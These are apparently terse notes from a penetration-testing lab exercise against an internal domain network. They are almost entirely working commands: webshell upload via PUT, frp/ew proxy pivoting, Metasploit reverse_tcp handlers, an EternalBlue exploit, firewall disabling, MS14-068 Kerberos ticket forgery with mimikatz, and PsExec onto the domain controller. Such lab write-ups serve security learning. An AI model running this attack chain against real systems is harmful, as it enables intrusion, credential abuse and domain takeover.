Information gathering
Port 2001
Port 2002
Capture the request, change it to PUT, upload the webshell (prefix the path with /)
python -c 'import pty; pty.spawn("/bin/bash")'
Add a proxy
Environment reset (for personal reasons)
Kali IP address changed to 192.168.1.128
CentOS IP address is 192.168.1.130
Modify the client (frpc)
Server (frps)
./frpc -c ./frpc.ini
./frps -c ./frps.ini
Or use an ew proxy
chmod 777 ew_for_linux64
./ew_for_linux64 -s ssocksd -l 1080
proxychains proxy
vi /etc/proxychains.conf
proxychains msfconsole
use exploit/multi/handler
set payload java/meterpreter/reverse_tcp
set lhost 192.168.1.128
set lport 4440
run
route add 192.168.183.0 255.255.255.0 2
route print
Host discovery
use auxiliary/scanner/smb/smb_version
set rhosts 192.168.183.1/24
set threads 10
run
msf5 exploit(multi/handler) > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.183.128-132
rhosts => 192.168.183.128-132
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lport 4440
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.183.129
msf5 exploit(windows/smb/ms17_010_eternalblue) >set lhost 192.168.1.128
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
set payload windows/x64/shell/bind_tcp
Only got a plain shell
Code page 65001 (UTF-8) fixes the garbled output
chcp 65001
netsh firewall set opmode disable (disables the firewall)
ipconfig
List machines in the domain
net view /domain:demo
View the desktop
ms14-068.exe -u douser@demo.com -p Dotest123 -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.183.130
kerberos::purge
kerberos::list
kerberos::ptc TGT_douser@demo.com.ccache
Access files on the domain controller
dir \\WIN-ENS2VR5TR3N\c$
Getting a shell with PsExec.exe from the PSTools directory failed
PsExec64.exe \\WIN-ENS2VR5TR3N cmd.exe
References
https://www.cnblogs.com/yuzly/p/10859520.html
https://blog.51cto.com/loveemily/2163147
https://blog.csdn.net/deng_xj/article/details/88952420
https://www.cnblogs.com/PANDA-Mosen/p/13118210.html